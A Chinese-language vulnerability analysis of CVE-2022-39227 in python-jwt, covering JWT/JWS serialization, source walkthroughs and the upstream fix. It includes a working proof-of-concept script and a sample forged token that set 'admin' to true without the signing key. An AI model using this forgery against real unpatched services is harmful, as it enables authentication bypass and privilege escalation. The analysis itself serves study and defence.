CVE-2022-39227描述了python-jwt < 3.3.4模块存在身份验证绕过漏洞,即攻击者在不知道JWT的加密密钥的情况下,仍然可以伪造JWT的内容。
举个例子:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
| import json
import python_jwt as jwt # python-jwt == 3.3.3
import jwcrypto.jwk as jwk
from datetime import timedelta
secret_key = jwk.JWK.generate(kty='oct', size=256)
# 生成原始JWT
original_payload = {"admin": False}
original_token = jwt.generate_jwt(original_payload, secret_key, 'HS256', timedelta(minutes=5))
print("---- Original JWT ----")
print(original_token)
# 攻击
[header, payload, signature] = original_token.split('.')
decoded_payload = json.loads(jwt.base64url_decode(payload))
decoded_payload['admin'] = True # 篡改admin值进行提权
forged_payload = jwt.base64url_encode(json.dumps(decoded_payload))
forged_token = '''{
"%s.%s.": "",
"protected": "%s",
"payload": "%s",
"signature": "%s"
}''' % (header, forged_payload, header, payload, signature)
print("---- Forged Token ----")
print(forged_token)
# 验证
verify_result = jwt.verify_jwt(forged_token, secret_key, ['HS256'])
print("---- Verify Result ----")
print(verify_result)
|
运行结果如下:
可以看到,forged_token与先前的original_token的结构似乎截然不同,却顺利地通过了verify_jwt()的校验,并且解析结果就是攻击者篡改后的'admin': True的结果。
这样的结果令人不可思议:为什么攻击者连signature都没修改,就顺利通过了校验呢?下面我们将详细探讨。
0x01 前置知识(JWT&JWS)#
JWT#
我们来观察这样一个字符串:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiYWRtaW4iOnRydWUsImlhdCI6MTUxNjIzOTAyMn0.KMUFsIDTnFmyG3nMiGM6H9FNFUROf3wh7SmqJp-QV30
可以注意到,这个字符串由3个部分组成,每个部分都经过了base64编码,并以.连接。对每个部分进行base64解码,可以发现第一个部分内容为
1
2
3
4
| {
"alg": "HS256",
"typ": "JWT"
}
|
我们将其称作Header,中文翻译为“头部”。这里,alg字段标明了字符串使用的加密算法是HS256,typ字段标明了这一个编码对象是JWT。
第二个部分内容为
1
2
3
4
5
6
| {
"sub": "1234567890",
"name": "John Doe",
"admin": true,
"iat": 1516239022
}
|
我们将其称作Payload,中文翻译为“载荷”。这里,我们可以注意到像sub,iat这样的注册声明名称(Registered Claim Names),也有name,admin这样的用户自行定义的字段。关于更多注册声明名称的含义,读者可查阅RFC 7519等资料进一步了解。
第三个解码后似乎是一团乱码,我们不妨看看它的Hex:
00000000 28 c5 05 b0 80 d3 9c 59 b2 1b 79 cc 88 63 3a 1f |(Å.°.Ó.Y².yÌ.c:.|
00000010 d1 4d 15 44 4e 7f 7c 21 ed 29 aa 26 94 15 df |ÑM.DN.|!í)ª&..ß|
这个部分称作Signature,也就是签名。这意味着其没有可读性,而用于校验字符串是否被别人篡改。Signature对Header和Payload部分的内容进行签名。
Header部分的alg字段标明了签名使用的是HS256算法,也就是 HMAC using SHA-256 算法计算得到的签名值。关于更多alg字段含义,读者可查阅RFC 7518等资料进一步了解。
既然Header部分的typ字段表明了这个字符串是JWT,我们也理所当然将这个字符串称作JWT(JSON Web Token)。上述关于Header,Payload,Signature的介绍也是关于JWT的介绍。
其实,这个字符串也可称作“紧凑型的JWS”。
JWS#
JWS(JSON Web Signature)拥有两种形式,一种是JSON形式的,称作JWS JSON 序列化(JWS JSON Serialization),另一种就是如刚才我们所见的,称作JWS 紧凑序列化(JWS Compact Serialization)。
JWS JSON Serialization#
JWS JSON 序列化的通用形式如下:
1
2
3
4
5
6
7
8
9
10
11
| {
"payload":"<payload contents>",
"signatures":[
{"protected":"<integrity-protected header 1 contents>",
"header":<non-integrity-protected header 1 contents>,
"signature":"<signature 1 contents>"},
...
{"protected":"<integrity-protected header N contents>",
"header":<non-integrity-protected header N contents>,
"signature":"<signature N contents>"}]
}
|
遇到单个signature的情况下,我们可以使用扁平化的JWS JSON 序列化(Flattened JWS JSON Serialization):
1
2
3
4
5
6
| {
"payload":"<payload contents>",
"protected":"<integrity-protected header contents>",
"header":<non-integrity-protected header contents>,
"signature":"<signature contents>"
}
|
综上所述,JWS JSON 序列化有通用形式、扁平化形式这两种形式,其中扁平化形式用于优化只有单个signature的情况。
JWS JSON 序列化的头部分为“受保护的头部”(JWS Protected Header)和“不受保护的头部”(JWS Unprotected Header)两种,分别对应protected与header字段。因此,protected字段和payload字段的内容会参与签名,从而防止在传输过程中遭到攻击者篡改。而header字段内容不会参与签名。
JWS Compact Serialization#
JWS 紧凑序列化的格式也正如刚才对JWT的介绍所示,即
BASE64URL(UTF8(JWS Protected Header)) || '.' ||
BASE64URL(JWS Payload) || '.' ||
BASE64URL(JWS Signature)
值得注意的是,JWS 紧凑序列化只有Protected Header,也就是说相对于JWS JSON 序列化而言,它的header内容全部属于protected字段。因此JWS 紧凑序列化的Header与Payload都会参与签名,这恰好与JWT的情况相同。
由此可见,对于刚才所举例子的字符串,我们可以同时称呼它为“JWT”和“JWS 紧凑序列化”。
0x02 源码分析#
回到正题上来,我们对源码进行分析,从而理解漏洞的形成原因以及如何利用该漏洞。
verify_jwt()#
verify_jwt()的源码如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
| def verify_jwt(jwt,
pub_key=None,
allowed_algs=None,
iat_skew=timedelta(),
checks_optional=False,
ignore_not_implemented=False):
if allowed_algs is None:
allowed_algs = []
if not isinstance(allowed_algs, list):
# jwcrypto only supports list of allowed algorithms
raise _JWTError('allowed_algs must be a list')
header, claims, _ = jwt.split('.')
parsed_header = json_decode(base64url_decode(header))
alg = parsed_header.get('alg')
if alg is None:
raise _JWTError('alg header not present')
if alg not in allowed_algs:
raise _JWTError('algorithm not allowed: ' + alg)
if not ignore_not_implemented:
for k in parsed_header:
if k not in JWSHeaderRegistry:
raise _JWTError('unknown header: ' + k)
if not JWSHeaderRegistry[k].supported:
raise _JWTError('header not implemented: ' + k)
if pub_key:
token = JWS()
token.allowed_algs = allowed_algs
token.deserialize(jwt, pub_key)
elif 'none' not in allowed_algs:
raise _JWTError('no key but none alg not allowed')
parsed_claims = json_decode(base64url_decode(claims))
utcnow = datetime.utcnow()
now = timegm(utcnow.utctimetuple())
typ = parsed_header.get('typ')
if typ is None:
if not checks_optional:
raise _JWTError('typ header not present')
elif typ != 'JWT':
raise _JWTError('typ header is not JWT')
iat = parsed_claims.get('iat')
if iat is None:
if not checks_optional:
raise _JWTError('iat claim not present')
elif iat > timegm((utcnow + iat_skew).utctimetuple()):
raise _JWTError('issued in the future')
nbf = parsed_claims.get('nbf')
if nbf is None:
if not checks_optional:
raise _JWTError('nbf claim not present')
elif nbf > now:
raise _JWTError('not yet valid')
exp = parsed_claims.get('exp')
if exp is None:
if not checks_optional:
raise _JWTError('exp claim not present')
elif exp <= now:
raise _JWTError('expired')
return parsed_header, parsed_claims
|
代码很长,我们进行逐段分析:
- 对参数
allowed_algs进行校验
1
2
3
4
5
6
7
| # allowed_algs为空时的处理
if allowed_algs is None:
allowed_algs = []
# 如果不是列表则抛出错误
if not isinstance(allowed_algs, list):
raise _JWTError('allowed_algs must be a list')
|
- 按照
.号将JWT分为三段,并将header部分解码
1
2
| header, claims, _ = jwt.split('.')
parsed_header = json_decode(base64url_decode(header))
|
- 检验
header字段是否合规
1
2
3
4
5
6
7
8
9
10
11
12
13
14
| # 判断alg字段内容是否合规
alg = parsed_header.get('alg')
if alg is None:
raise _JWTError('alg header not present')
if alg not in allowed_algs:
raise _JWTError('algorithm not allowed: ' + alg)
# 检查Header是否匹配JWSHeaderRegistry(默认不检查)
if not ignore_not_implemented:
for k in parsed_header:
if k not in JWSHeaderRegistry:
raise _JWTError('unknown header: ' + k)
if not JWSHeaderRegistry[k].supported:
raise _JWTError('header not implemented: ' + k)
|
- 对签名进行验证
函数对签名的验证过程在JWS.deserialize()中,本文随后对其进行源码分析。
1
2
3
4
5
6
7
8
| # 如果传参了公钥pub_key便对签名进行验证
if pub_key:
token = JWS()
token.allowed_algs = allowed_algs
token.deserialize(jwt, pub_key) # 对JWT进行JWS反序列化
# 如果不允许不签名就抛出错误
elif 'none' not in allowed_algs:
raise _JWTError('no key but none alg not allowed')
|
- 对
payload部分进行相关检验
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
| parsed_claims = json_decode(base64url_decode(claims))
utcnow = datetime.utcnow()
now = timegm(utcnow.utctimetuple())
typ = parsed_header.get('typ')
if typ is None:
if not checks_optional:
raise _JWTError('typ header not present')
elif typ != 'JWT':
raise _JWTError('typ header is not JWT')
iat = parsed_claims.get('iat')
if iat is None:
if not checks_optional:
raise _JWTError('iat claim not present')
elif iat > timegm((utcnow + iat_skew).utctimetuple()):
raise _JWTError('issued in the future')
nbf = parsed_claims.get('nbf')
if nbf is None:
if not checks_optional:
raise _JWTError('nbf claim not present')
elif nbf > now:
raise _JWTError('not yet valid')
exp = parsed_claims.get('exp')
if exp is None:
if not checks_optional:
raise _JWTError('exp claim not present')
elif exp <= now:
raise _JWTError('expired')
|
- 返回解析后的
header和payload部分的内容
1
| return parsed_header, parsed_claims
|
总结一下,对于这样的一个JWT:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbiI6ZmFsc2UsImV4cCI6MTc0NzAzMzI1MiwiaWF0IjoxNzQ3MDMyOTUyLCJqdGkiOiJWNEtjSnVBRnRSUEd0ZnVzbVdJbTZRIiwibmJmIjoxNzQ3MDMyOTUyfQ.tuY-k9-4kB5mVtL4PAZn9-ABdr6eBPE-24j_jIAeAQM
经过verify_jwt()的处理后,可以得到:
1
2
3
4
5
6
7
| header, claims, _ = jwt.split('.')
# header = eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
# claims = eyJhZG1pbiI6ZmFsc2UsImV4cCI6MTc0NzAzMzI1MiwiaWF0IjoxNzQ3MDMyOTUyLCJqdGkiOiJWNEtjSnVBRnRSUEd0ZnVzbVdJbTZRIiwibmJmIjoxNzQ3MDMyOTUyfQ
parsed_header = json_decode(base64url_decode(header))
# parsed_header = {"alg":"HS256","typ":"JWT"}
parsed_claims = json_decode(base64url_decode(claims))
# parsed_claims = {"admin":false,"exp":1747033252,"iat":1747032952,"jti":"V4KcJuAFtRPGtfusmWIm6Q","nbf":1747032952}
|
并且会将JWT传入到JWS.deserialize()进行签名验证。
JWS.deserialize()#
JWS.deserialize()的源码如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
| def deserialize(self, raw_jws, key=None, alg=None):
self.objects = {}
o = {}
try:
try:
djws = json_decode(raw_jws)
if 'signatures' in djws:
o['signatures'] = []
for s in djws['signatures']:
os = self._deserialize_signature(s)
o['signatures'].append(os)
self._deserialize_b64(o, os.get('protected'))
else:
o = self._deserialize_signature(djws)
self._deserialize_b64(o, o.get('protected'))
if 'payload' in djws:
if o.get('b64', True):
o['payload'] = base64url_decode(str(djws['payload']))
else:
o['payload'] = djws['payload']
except ValueError:
data = raw_jws.split('.')
if len(data) != 3:
raise InvalidJWSObject('Unrecognized'
' representation') from None
p = base64url_decode(str(data[0]))
if len(p) > 0:
o['protected'] = p.decode('utf-8')
self._deserialize_b64(o, o['protected'])
o['payload'] = base64url_decode(str(data[1]))
o['signature'] = base64url_decode(str(data[2]))
self.objects = o
except Exception as e: # pylint: disable=broad-except
raise InvalidJWSObject('Invalid format') from e
if key:
self.verify(key, alg)
|
该方法同时实现了对JWS JSON 序列化和JWS 紧凑序列化的反序列化。首先,JWS.deserialize()先对传入的字符串尝试进行JSON解析。如果能正常解析,则进入对JWS JSON 序列化的处理流程;反之,如果抛出了ValueError错误,则进入对JWS 紧凑序列化的处理流程。
对JWS JSON 序列化的处理流程如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
| try:
djws = json_decode(raw_jws) # JSON解析
# 对通用形式的处理
if 'signatures' in djws:
o['signatures'] = []
for s in djws['signatures']:
os = self._deserialize_signature(s) # 提取protected、header、signature
o['signatures'].append(os)
self._deserialize_b64(o, os.get('protected')) # 校验b64值
# 对扁平化形式的处理
else:
o = self._deserialize_signature(djws) # 提取protected、signature
self._deserialize_b64(o, o.get('protected')) # 校验b64值
if 'payload' in djws:
if o.get('b64', True): # 若b64为True(True为默认值,且可以不标注)
o['payload'] = base64url_decode(str(djws['payload'])) # 对payload进行base64解码
else:
o['payload'] = djws['payload']
|
对JWS 紧凑序列化的处理流程如下:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
| except ValueError:
data = raw_jws.split('.') # 将字符串按照'.'拆分
# 拆分后如果不是3个部分则说明格式错误
if len(data) != 3:
raise InvalidJWSObject('Unrecognized'
' representation') from None
# 取header部分
p = base64url_decode(str(data[0]))
if len(p) > 0:
o['protected'] = p.decode('utf-8') # JWS紧凑序列化的header
self._deserialize_b64(o, o['protected'])
o['payload'] = base64url_decode(str(data[1]))
o['signature'] = base64url_decode(str(data[2]))
|
Tip:
这里分享一个笔者联想到的,与漏洞分析无关的小点子。
观察到代码中的if len(p) > 0,让人好奇:先前的if len(data) != 3似乎已经保证了Protected Header部分的内容不会为”空“了,为什么还需要加上这个校验呢?事实上,if len(data) != 3只能保证data[0]的内容不会为null。然而当data[0]的内容为'=='、'==='、'===='时,base64url_decode()也会返回空字符串,Protected Header部分的内容仍然可能为“空”。因此if len(p) > 0校验并非冗余。
那么Protected Header的内容为==、'==='、'===='时会发生什么?当len(p) == 0,在此后的JWS._verify()方法中也会报错No "alg" in headers。因此Protected Header的内容始终不能为“空”,即使想用刚才的一堆=滥竽充数也不行。
总结一下,JWS.deserialize()会首先尝试对传入的字符串进行JSON解析,如果行不通的话,就会再尝试进行JWS 紧凑序列化的解析。
最后,若参数key存在,则对signature进行验证。
1
2
| if key:
self.verify(key, alg)
|
0x03 漏洞解析#
我们观察一下恶意token的格式:
1
2
3
4
5
6
| forged_token = '''{
"%s.%s.": "",
"protected": "%s",
"payload": "%s",
"signature": "%s"
}''' % (header, forged_payload, header, payload, signature)
|
也就是
1
2
3
4
5
6
| {
"<header>.<forged_payload>.": "",
"protected": "<header>",
"payload": "<payload>",
"signature": "<signature>"
}
|
我们首先举个恶意token的例子,看看漏洞是如何利用的。
1
2
3
4
5
6
| {
"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJhZG1pbiI6IHRydWUsICJleHAiOiAxNzQ3MDQwOTM5LCAiaWF0IjogMTc0NzA0MDYzOSwgImp0aSI6ICJpRmU1VVN6eVhkZnR4SndWNFRGUjBRIiwgIm5iZiI6IDE3NDcwNDA2Mzl9.": "",
"protected": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9",
"payload": "eyJhZG1pbiI6ZmFsc2UsImV4cCI6MTc0NzA0MDkzOSwiaWF0IjoxNzQ3MDQwNjM5LCJqdGkiOiJpRmU1VVN6eVhkZnR4SndWNFRGUjBRIiwibmJmIjoxNzQ3MDQwNjM5fQ",
"signature": "1BftylfzfqBgMFnZ7Sp5S-NNZSYtax2TKEg_CXXmMbM"
}
|
乍一看这就是一个JSON字符串。在JWS.deserialize()眼中,它是一个JWS JSON 序列化。不过,它在verify_jwt()眼中却是这样的一个JWT:
`Header`: {"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
`Payload`: eyJhZG1pbiI6IHRydWUsICJleHAiOiAxNzQ3MDQwOTM5LCAiaWF0IjogMTc0NzA0MDYzOSwgImp0aSI6ICJpRmU1VVN6eVhkZnR4SndWNFRGUjBRIiwgIm5iZiI6IDE3NDcwNDA2Mzl9
`Signature`: ": "","protected": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9","payload": "eyJhZG1pbiI6ZmFsc2UsImV4cCI6MTc0NzA0MDkzOSwiaWF0IjoxNzQ3MDQwNjM5LCJqdGkiOiJpRmU1VVN6eVhkZnR4SndWNFRGUjBRIiwibmJmIjoxNzQ3MDQwNjM5fQ","signature": "1BftylfzfqBgMFnZ7Sp5S-NNZSYtax2TKEg_CXXmMbM"}
因此,对于这个恶意token,经过verify_jwt()解析后为:
1
2
3
4
5
6
7
| header, claims, _ = jwt.split('.')
# header = {"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9
# claims = eyJhZG1pbiI6IHRydWUsICJleHAiOiAxNzQ3MDQwOTM5LCAiaWF0IjogMTc0NzA0MDYzOSwgImp0aSI6ICJpRmU1VVN6eVhkZnR4SndWNFRGUjBRIiwgIm5iZiI6IDE3NDcwNDA2Mzl9
parsed_header = json_decode(base64url_decode(header))
# parsed_header = {"alg":"HS256","typ":"JWT"}
parsed_claims = json_decode(base64url_decode(claims))
# parsed_claims = {"admin": true, "exp": 1747040939, "iat": 1747040639, "jti": "iFe5USzyXdftxJwV4TFR0Q", "nbf": 1747040639}
|
而JWS.deserialize()会将它当作扁平化形式的JWS JSON 序列化进行处理。解析结果为:
1
2
3
4
5
| o = self._deserialize_signature(djws)
# o['protected'] = {"alg":"HS256","typ":"JWT"}
# o['signature'] = b'\xd4\x17\xed\xcaW\xf3~\xa0`0Y\xd9\xed*yK\xe3Me&-k\x1d\x93(H?\tu\xe61\xb3'
o['payload'] = base64url_decode(str(djws['payload']))
# o['payload'] = {"admin":false,"exp":1747040939,"iat":1747040639,"jti":"iFe5USzyXdftxJwV4TFR0Q","nbf":1747040639}
|
Tip:
在对header进行base64解码时,会因为{和"字符抛出异常吗?
JWS.deserialize()进行base64解码时使用的是jwcrypto.common.base64url_decode(),这一函数其实调用了base64.urlsafe_b64decode(),而它其实调用了base64.b64decode()。阅读base64.b64decode()的官方文档,我们得知:
If validate is False (the default), characters that are neither in the normal base-64 alphabet nor the alternative alphabet are discarded prior to the padding check. If validate is True, these non-alphabet characters in the input result in a binascii.Error.
jwcrypto.common.base64url_decode()与base64.urlsafe_b64decode()都没有将validate值设置为True,因此程序会丢弃{和"字符,也就不会因为这些字符而抛出异常。
JWS.deserialize()会提取这个JSON字符串中protected、payload、signature字段的值。它获取的protected与payload的值都来源于original_token,将它们带入验证,最终signature验证通过也是理所当然的。
verify_jwt()得知signature验证通过了,就返回parsed_header与parsed_claims的值。可是,返回的parsed_claims却是攻击者篡改过的值,其中包含"admin": true。至此,攻击者提权成功。
让我们总结一下思路。
攻击者精心构造恶意token,这个恶意token同时符合JWS JSON 序列化和JWS 紧凑序列化的特征。
JWS.deserialize()的期望效果是将传入的token当作JWS 紧凑序列化,因为一个正常的JWT同时也是JWS 紧凑序列化。
然而JWS.deserialize()将恶意token当作了JWS JSON 序列化,在对signature进行校验时使用的值是原汁原味的<header>与<payload>,校验自然成功。
得知signature校验成功后,verify_jwt()返回的期望值应当是<header>与<payload>。
然而对于恶意token,verify_jwt()返回的值却是<header>与<forged_payload>。攻击者成功欺骗了verify_jwt(),使其返回了攻击者篡改的值。
0x04 漏洞修复#
阅读作者修复漏洞的commit,我们得知:verify_jwt()在进行后续处理前,首先会通过_check_jwt_format()验证JWT的格式:
1
2
3
4
| _jwt_re = re.compile(r'^[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]+\.[A-Za-z0-9\-_]*$')
def _check_jwt_format(jwt):
if not _jwt_re.match(jwt):
raise _JWTError('invalid JWT format')
|
也就是说,JWT不再能包含{、}、"、:等等符号了。攻击者无法构造符合JWS JSON 序列化特征的JWT进行攻击,漏洞修复完成。
相关文章#